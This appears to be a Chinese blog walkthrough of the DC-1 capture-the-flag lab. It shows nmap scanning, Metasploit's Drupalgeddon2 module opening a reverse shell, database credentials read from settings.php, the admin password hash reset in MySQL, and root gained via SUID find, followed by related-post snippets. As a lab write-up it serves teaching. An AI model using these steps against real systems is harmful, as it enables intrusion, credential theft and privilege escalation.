DC-1靶机渗透

已于 2022-05-21 12:55:13 修改
阅读量3.6k 收藏 2
点赞数 1
分类专栏: DC靶机系列 文章标签: 其他
于 2022-04-28 08:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62008601/article/details/124448970
版权

攻击机:kali IP:192.168.56.102

靶机:DC-1 IP:192.168.56.101

我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)网络设置的是仅主机网络

559d21295078407d97595f96c7d336a1.png

kali是在VMware里的,网络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。

在kali终端输入ifconfig查看本机ip:192.168.56.102,得到之后可以使用命令

nmap 192.168.56.0/24

进行扫描,可以直接得到dc1的IP以及开放的端口。

494f3d88a3c74a128014fa8a4b62f75c.png

显而易见,靶机ip为192.168.56.101,且开放了80端口,确定的方法就可以看mac address那一行的末尾的信息,192.168.56.1这个IP的来源是unknown,而192.168.56.101的来源是virtualbox。除此之外还可以使用arp命令进行扫描,

扫描存活主机:arp-scan -l

扫描开放端口:nmap -sV 192.168.56.101

接着继续,看到开放了80端口之后,我们就可以用浏览器打开进行访问了。

03ceb1902bd54ec48ac88e2d1fb3e139.png

熟悉的人可以直接知道cms里是有Drupal的,不懂的可以用火狐的插件wappalyzer,也能显示出这个信息,这时候可以用kali自带的msf进行漏洞利用。

进入msf:msfconsole

查找漏洞利用模块:search drupal

e1382690affe401187922faf1f2f0974.png

可以发现有很多个版本的,这里我用2018年的这个,利用use进行调用漏洞模块:use 1

或者你也可以输入1后面的那一长串东西,use exploit/unix/webapp/drupal_drupalgeddon 2

接着使用命令:show options设置必选项,把lhost设置为kali的ip,rhosts设置为dc-1的ip

命令:

set rhosts 192.168.56.101
set lhost 192.168.56.102

设置完必选项之后,开始运行:exploit,这时就转换成了meterpreter,之后反弹一个交互式的shell

5be0c96464114421b235a43b27219988.png代码:

python -c 'import pty;pty.spawn("/bin/sh")'

 之后打开目录就发现了第一个flag。

bd1c9a75f96948659312dfef5a24a5b2.png

得到提示说需要配置cms文件,百度了解到Drupal的默认配置文件为 /var/www/sites/default/settings.php,打开settings.php文件之后就可以发现有flag2和mysql数据库的用户名和密码

b2264590d1b44731aa0f7050cbb78e1c.png

然后进行数据库的连接

f0185b3311284604adb1a1353c42b849.png

连接正常,采取重置用户密码 的操作,查询资料了解到一般drupal对数据库的加密方法是把加密脚本放在网站根目录下scripts文件下

bc41fede9df248248577e78ddbebf715.png

看到有个password-hash.sh文件,使用drupal自带脚本重新生成密码

ac1b46f15e314645a4cd23874bb3e02d.png

得到新密码的hash值之后对密码就可以进行修改密码的操作了,重新连接mysql数据库

输入

update drupaldb.users set pass="hash值" where uid=1;

e4ceeb6c7b304a2ebb3ba416a6f826b5.png

 修改完成之后进入网站进行登录,

bb1184428db94920a8b06ca821cbc85b.png

此时在conten下发现有flag3

1314e163386947b88ed23bfa250c9f26.png

e2aecd0696d8488baa56000db2e89d3e.png

根据提示的意思是要找passwd文件,且涉及到提权的问题。

进入etc目录找到passwd文件并打开

31c0abca74bc4e3bbe916a57b708101d.png

e83a808dbf94432eb850d4f727263f7b.png

此时发现home目录下有flag4

a66b87dc5c7740fca28d66cea760efa1.png

得到提示说以同样的方式找到在root下的flag。

那就要进行提权了,接下来查找具有root权限的命令。

find /perm -u=s -type f 2>/dev/null
find / -perm -4000

c38f3271257b4fa89032b91bb25aa562.png

d0ccec18ccc747b29f6226403f225374.png

发现find本身就是root权限的命令,此时也发现了它的路径:/usr/bin/find

接着用find命令进行提权:

ls -lh /usr/bin/find
find ./ aaa -exec '/bin/sh' \;

之后回到根目录进入root文件夹,发现最后的flag

4d5bf51fc4ab4ceeb7e39213fa915513.png

至此,DC-1靶机结束

参考链接:Vulnhub靶机DC_1渗透_哔哩哔哩_bilibili

7562ajj
关注
专栏目录
DC-1靶机渗透
applekelly的博客
03-28 112
主机扫描,扫描主机IP查看靶机mac地址,从而查询IP22端口和80端口是我们的突破口,访问网页查看站点信息,也可以自行判断,网页一看就是cms就是drupal也可以用kalli自带的工whatweb扫描可以扫出cms,然后再用dirb工具扫一下网站目录还是扫出了很多目录,咱们先放一放暂时得到了以下信息CMS是Drupal Apache 2.2.22PHP 5.4.45。
DC-1靶机渗透测试
Liumx0105的博客
12-20 955
思路:信息收集→漏洞探测→漏洞利用→提权
DC1渗透
qq_43430261的博客
03-06 741
kail虚拟机ip为 nmap -sP 192.168.72.197/24 扫描本网段存活主机 nmap -sV 192.168.72.198 查看靶机开放了哪些服务及服务版本 发现靶机开放ssh服务和http服务 尝试访问http服务 使用插件Wappalyzer进行网站指纹识别发现网站使用Drupal 7.x管理系统 用MSF search一下该CMS已知的漏洞 启动msf(m...
DC-1靶机通关教学(DC靶场系列)
最新发布
qq_73413340的博客
08-26 902
好吧,就只有一个flag文件,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行
DC-1 靶机渗透
m0_62970186的博客
04-02 1224
文章目录DC-1 靶机渗透***\*前提思路\*******\*信息收集\*******\*端口扫描\*******\*网站信息\*******\*漏洞映射\*******\*权限提升\*******\*提权思路\**** DC-1 靶机渗透 *概况*: 下载地址 https://www.vulnhub.com/entry/dc-1,292/ *官方描述:* DC-1 is a purposely built vulnerable lab for the purpose of gaining experi
DC-1靶机
weixin_52525624的博客
02-24 293
nmap -sP 192.168.1.0/24 然后找到咱们的靶机 nmap -sV -Pn -n 192.168.1.57 访问该站点并查看robots.txt敏感文件 依次访问robots.txt文件中的敏感文件目录信息,发现UPGRADE.txt文件爆露出版本号 寻找drupal 7.X版本漏洞,并进行利用 2:使用MSF搜索相关模块并进行利用 Search drupal Use exploit/unix/webapp/drupal_drup...
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1248
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-1靶机渗透笔记
qq_60600840的博客
08-08 258
DC-1靶机、安全、渗透靶机
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1440
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
dc-1靶机
qq_63267612的博客
09-28 1330
显示修改成功,尝试去登陆发现登陆失败,这里显示的密码是加密过的,尝试去找到drupaldb的加密方式,然后把密码更改为一个加密过的但是是已知的密码。可以看到开放了ssh端口和http和111端口,尝试查看一下网站,有一个登陆框,尝试sql注入,发现没有用,不过可以从界面发现cms是drupal。使用说明:下载后解压后得到一个ova的文件,在vm虚拟机中直接打开设置好相关的设置,配置好之后,注意靶机和kali的网络设置调换成NAT模式。知道了cms是drupal,drupal有一些可以利用的漏洞进入msf。
DC1靶机渗透测试
Huangshanyoumu的博客
04-16 778
Vuln hub 渗透测试实战 Vulnhub是一个开放的安全靶场,我们可以使用它所提供的环境进行渗透测试实战。 DC所有环境下载地址:https://www.vulnhub.com/series/dc,199/ 环境搭建: 1.下载 OVA(Open Virtualization Appliance:开放虚拟化设备)https://www.vulnhub.com/entry/dc-1-1,292/ 2.拖入 VMware 打开,配置相关设置,开启运行 3.打开 Kali Linux 进行渗透 1.探测
五 Vulnhub-DC1靶机渗透
devil8123665的博客
07-21 266
Vulnhub-DC1靶机渗透 https://blog.csdn.net/adminuil/article/details/101269264
记录一下 DC1靶机渗透
吃醋不爱蘸饺子的胡诌乱造
01-12 567
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里)。 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1靶机的ip地址192.168.1.108(这个当时扫了半天都没有扫到,我在nat网络和桥接里反复横跳,最终还是它自己好了(充分证明了当你做不出来,可以歇一歇然后自己就好了。猜测是网络切换需要一定的时间) 2.扫描这个ip地址开放的端口 可以看出来这里开放了80端口,我们可以看一下! 然后就是上图这个样子! 三.开始渗透 典型的drupal(我
DC1靶机
孤的博客
09-30 1128
目标探测 因为是在局域网内,所以使用内网扫描 目标已经确定,进行端口扫描 namp -sT -sC -p- -sV -T 3 -sT 全连接 -sC 使用默认的安全脚本 -p- 全端口 -sV 版本探测 -T 时间频率(太快的话,可能什么也扫不到) 根据扫描结果,我们以80端口位突破口 很明显,我们看到网站的cms,所以我们可以直接在网上搜索这个cms的漏洞利用方式 使用metaspl...
DC1靶机
qq_40646572的博客
05-01 410
信息收集 开启靶机。 使用namp扫描进行信息搜集。 全端口扫描,查看是否有超过1000的端口。nmap扫描后,发现仅存在22端口以及80端口处于开放状态。说明ssh服务以及http服务正在运行,靶机突破点。 首先搜集http服务信息。 打开http服务,获取cms信息,发现是Drupal7框架。 习惯性使用nmap漏洞脚本扫描,发现惊喜。drupal7.x存在Sql注入漏洞。 漏洞利用 打开亲爱的msf,搜索下是否存在直接利用的exp,发现存在可以直接利用的exp。 设置好rhost以及相应
DC1-靶机详解
TonyChaoWei的博客
02-06 1868
DC系列靶机渗透实战 提权
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值